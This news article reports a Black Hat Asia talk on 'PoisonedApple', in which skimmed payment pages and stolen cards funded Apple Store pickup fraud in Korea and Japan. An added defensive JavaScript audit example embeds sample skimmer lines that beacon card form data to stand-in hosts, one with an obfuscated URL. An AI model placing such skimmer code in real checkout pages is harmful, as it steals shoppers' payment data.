At this year's Black Hat Asia hacking conference, a pair of security researchers revealed how cybercriminals combined stolen credit cards with the Apple Store Online's "Someone Pick It Up" option to pocket more than $400,000 in just two years.
9to5Mac Security Bite is brought to you exclusively by Mosyle, the only Apple Unified Platform. Making Apple devices work-ready and enterprise-safe is all we do. Our unique integrated approach to management and security combines state-of-the-art Apple-specific security solutions for fully automated hardening and compliance, next-generation EDR, AI-powered Zero Trust, and exclusive privilege management with the most powerful and modern Apple MDM on the market. The result is a fully automated Apple Unified Platform currently trusted by over 45,000 organizations to make millions of Apple devices work-ready with no effort and at an affordable cost. Request your extended trial today and find out why Mosyle is everything you need to work with Apple.
According to Gyuyeon Kim and Hyunho Cho of Korea's Financial Security Institute, in September 2022 they and their colleagues uncovered a series of cyberattacks on more than 50 legitimate online stores and the large-scale data breach that followed. Further analysis, however, showed that the attackers were after more than simple theft of user data.
The cybercriminals tampered with the payment pages of these online stores so that customers' credit card and personal information was sent to servers under the attackers' control in addition to the merchant's legitimate server. Because the real checkout still completed normally, neither the customer nor the store had an obvious reason to notice anything wrong.
"Using multiple vulnerabilities and tools, these threat groups employed various evasion strategies to prevent detection of phishing pages by site administrators and users," the pair state in their Black Hat briefing.
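As an added illustration of the tampered-payment-page pattern described above (my own example, not code from the researchers' briefing or from 9to5Mac), the JavaScript below statically audits a checkout page's inline scripts for network destinations other than the merchant and its payment processor, which is the tell-tale "second destination" a skimmer introduces. The sample page, the allowlist and every host name in it are constructed assumptions for this example.

```javascript
// Added example, not code from the Black Hat briefing or from 9to5Mac: a static
// audit of a checkout page for the "second destination" pattern, where a tampered
// payment script copies card data to an attacker server in addition to the
// merchant's legitimate one. The page, host names and allowlist below are
// constructed for this example.

// Assumption: the merchant's own origin and its payment processor are the only
// origins a checkout script should ever talk to.
const ALLOWED_ORIGINS = ["https://shop.example", "https://pay.example"];

// Constructed checkout page. The first network call is the legitimate charge;
// the lines marked "injected" mimic a skimmer: one sends a plain copy of the
// form to a look-alike "static" host, the other hides its URL scheme with
// String.fromCharCode so a naive URL grep misses it.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="pay"><input name="card"><input name="cvv"><input name="name"></form>
<script>
  const form = document.getElementById("pay");
  form.addEventListener("submit", async (e) => {
    e.preventDefault();
    const body = JSON.stringify(Object.fromEntries(new FormData(form)));
    await fetch("https://pay.example/v1/charge", { method: "POST", body });
    navigator.sendBeacon("https://cdn-shop-static.example/stat.php", body); // injected
    const s = String.fromCharCode(104, 116, 116, 112, 115) + "://img-shop.example/p.gif?d="; // injected
    new Image().src = s + encodeURIComponent(body);
  });
</script>
</body></html>`;

// Pull the body of every inline <script> element out of the HTML.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

const URL_LITERAL_RE = /["'](https?:\/\/[^"'\s]+)["']/g;
// Calls commonly used to assemble or decode a hidden destination at runtime.
const OBFUSCATION_RE = /\b(?:atob|unescape|String\.fromCharCode|eval)\s*\(/g;

// Returns every origin referenced by a string literal in an inline script that is
// not on the allowlist, plus any obfuscation primitives seen. A hidden URL cannot
// be recovered statically, so the hints are there to send a human to look further.
function auditCheckoutPage(html, allowedOrigins = ALLOWED_ORIGINS) {
  const allowed = new Set(allowedOrigins.map((o) => new URL(o).origin));
  const unknownOrigins = new Set();
  const obfuscationHints = [];
  for (const script of inlineScripts(html)) {
    for (const match of script.matchAll(URL_LITERAL_RE)) {
      let origin;
      try {
        origin = new URL(match[1]).origin;
      } catch {
        continue; // malformed literal, not a destination
      }
      if (!allowed.has(origin)) unknownOrigins.add(origin);
    }
    for (const match of script.matchAll(OBFUSCATION_RE)) obfuscationHints.push(match[0]);
  }
  return { unknownOrigins: [...unknownOrigins].sort(), obfuscationHints };
}

console.log(JSON.stringify(auditCheckoutPage(SAMPLE_CHECKOUT_HTML), null, 2));
```

Run against the sample, the audit reports `https://cdn-shop-static.example` as an unexpected destination and flags the `String.fromCharCode(` call; it cannot name the second exfiltration host, which is exactly the kind of evasion the researchers describe. A static scan like this is a cheap first pass for a site administrator; the stronger control is to restrict where the checkout page may send data at runtime, for example with a Content-Security-Policy `connect-src` directive limited to the same allowlist, and to monitor the live page for scripts and requests that were not there at deployment.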
However, the credit card theft was only part of the plan.
According to the research, one of the main ways the attackers turned the stolen cards into cash was by abusing the Apple Store Online's pickup-contact policy. "The ultimate goal of this operation was financial gain," Kim explained.
The scheme begins with listing new Apple products at "discounted" prices on Korean second-hand online marketplaces, which the researchers describe as comparable to Craigslist and eBay. Once a buyer reaches an agreement with the seller (in this case, the threat actor), the previously stolen credit card details are used to purchase the actual product from the Apple Store Online.
Instead of having the item shipped, the cybercriminal selects the "Someone Pick It Up" option on Apple's website. This allows a designated person to collect an online order at an Apple retail store by presenting a government-issued photo ID and the QR code or order number. The second-hand buyer is named as that third party and unknowingly picks up an item paid for with a stolen credit card.
The buyer pays only after collecting the product, presumably through the second-hand marketplace. If the buyer never sends the agreed amount, the attacker simply loses out on that sale.
For example, a brand-new iPhone 15 worth $800 might be listed on the used market for $700: low enough to attract interest, but high enough not to look like a scam. After finding an interested buyer, the criminal uses a stolen card number obtained in the phishing operation to buy the device and pockets the $700 the buyer pays through the second-hand marketplace.
In a more extreme case quoted from the Black Hat Asia presentation: "A stolen card was used to pay $10,000 at an Apple store, but the investigation was hampered because Apple refused to cooperate due to internal policies. Despite Mr. Yun's efforts to immediately report the incident to both the credit card company and the police, the investigation was delayed for more than a month due to Apple's lack of cooperation. Despite Apple's commitment to privacy, the company's refusal to provide information due to internal policy has sparked criticism not only in Japan but also in the United States."
Gyuyeon Kim and Hyunho Cho call the scheme "PoisonedApple" and estimate it has generated $400,000 over the past two years. Its current scope is South Korea and Japan, but there is no reason criminals in other countries, including the United States, could not start doing the same thing.
Who is behind the scheme?
The researchers believe the culprit is based somewhere in China, since the phishing web pages were registered through a Chinese ISP. Remarkably, while combing through dark web forums, they also found the same email address that appears in the phishing pages' source code, which is written in simplified Chinese.
Read the full Black Hat briefing and presentation here.
About this series
Follow Arin: Twitter/X, LinkedIn, Threads